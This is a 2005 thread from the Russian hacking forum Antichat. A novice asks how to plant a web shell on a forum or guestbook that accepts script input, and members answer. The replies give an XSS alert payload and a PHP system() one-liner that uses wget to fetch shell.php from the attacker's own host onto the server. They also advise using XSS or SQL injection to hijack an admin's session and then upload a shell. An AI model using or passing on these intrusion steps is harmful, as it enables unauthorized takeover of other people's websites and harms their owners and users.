ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Заливка шелла
  #1  
Старый 09.12.2005, 13:40
Аватар для T-4
T-4
Новичок
Регистрация: 01.11.2005
Сообщений: 8
Провел на форуме:
8492

Репутация: -1
По умолчанию Заливка шелла

Как залить шелл, если одно из полей для ввода (допустим на каком-нибудь форуме или гостевой) пропускает определённые символы (короче можно скрипты вставлять) ?
 
Ответить с цитированием

  #2  
Старый 09.12.2005, 14:07
Аватар для fucker"ok
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541

Репутация: 761


По умолчанию

Ты неправельно понял (или я тебя).
Скрипт ДОЛЖЕН загружать файлы. А если он пропускает какие-то символы, например при постинге сообщения в гостевой, то это тебе ничего не даёт, кроме xss||sql inj
 
Ответить с цитированием

  #3  
Старый 09.12.2005, 14:13
Аватар для grinay
grinay
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме:
1212666

Репутация: 662
Отправить сообщение для grinay с помощью ICQ
По умолчанию

Сморя какой там скрипт Возможно там есть php иньекция и ты не прав тогдаСсылку давай поглядим так на вскидку сказать не чего не могу.
__________________

 
Ответить с цитированием

  #4  
Старый 09.12.2005, 16:20
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

не думаю что в жаба скрипте буит пхп инъекция)))))))))))))
T-4 а ты введи <script>alert('Hacked by me!');</script>
и наслаждайся=)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #5  
Старый 09.12.2005, 20:21
Аватар для fucker"ok
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541

Репутация: 761


По умолчанию

Ссылку в студию. :]
 
Ответить с цитированием

  #6  
Старый 10.12.2005, 00:25
Аватар для NaX[no]rT
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

Если можно вставлять скрипты, попробуй вставь скрипт, чтобы он тебе шелл залил.
 
Ответить с цитированием

  #7  
Старый 11.12.2005, 01:19
Аватар для [504]
[504]
Новичок
Регистрация: 06.12.2005
Сообщений: 8
Провел на форуме:
35842

Репутация: 4
По умолчанию

NaX[no]r† :: " Если можно вставлять скрипты, попробуй вставь скрипт, чтобы он тебе шелл залил."

=)))))
вопрос читал не)))
Как залить шелл?

вот код на PHP

<? system("cd ../../;wget http://...../shell.php"); ?>

cd ../../ - папка куда залить..
wget - качалка. взависимости еcть ли он на серве..
может быть lynx и т.д.
http://...../shell.php - твой сайт с php-шеллом

А впринципе если *nux знаешь сам напишешь)))
 
Ответить с цитированием

  #8  
Старый 12.12.2005, 19:09
Аватар для fucker"ok
fucker"ok
Познавший АНТИЧАТ
Регистрация: 21.11.2004
Сообщений: 1,137
Провел на форуме:
2487541

Репутация: 761


По умолчанию

2 [504]
Про возможность выполнения команд на сервере тут ничего не говорилось, а говорилось тут о
Цитата:
пропускает определённые символы


Вообщем к сабжу. Как не старайся, но если скрипт пропускает какие-то символы шел никак не залить. (конечно, может быть случай когда поле "отправить коментарий" выпоняет команду на сервере, но такой случай мы не будем рассматривать)
Поэтому топикСтартеру советую рулить в сторону xss || sql inj, дабы заполучить "кусочек" админа, поставить себе этот кусочек и самому стать админом, а у админа больше прав, там уже и до шела не далеко :P
 
Ответить с цитированием

  #9  
Старый 01.01.2006, 19:05
Аватар для BymeR
BymeR
Познающий
Регистрация: 25.07.2005
Сообщений: 35
Провел на форуме:
105565

Репутация: 13
Отправить сообщение для BymeR с помощью ICQ
По умолчанию

Ты бы ссылку дал мы бы конкретнее посоветовали...
Действительно проще всего сейчас sql inj и какое нить поле создать(если то что ты хакаешь такое позволяет) чат php.sbp.ru например да...И всё...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла на PHP-Fusion. ilyha Форумы 11 09.12.2005 20:52
Заливка шелла черех смайлы в ipb ..::k0rps::.. Форумы 1 28.11.2005 14:48
Заливка шелла и снятие бана в ipb через mysql darks Форумы 14 26.11.2005 00:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ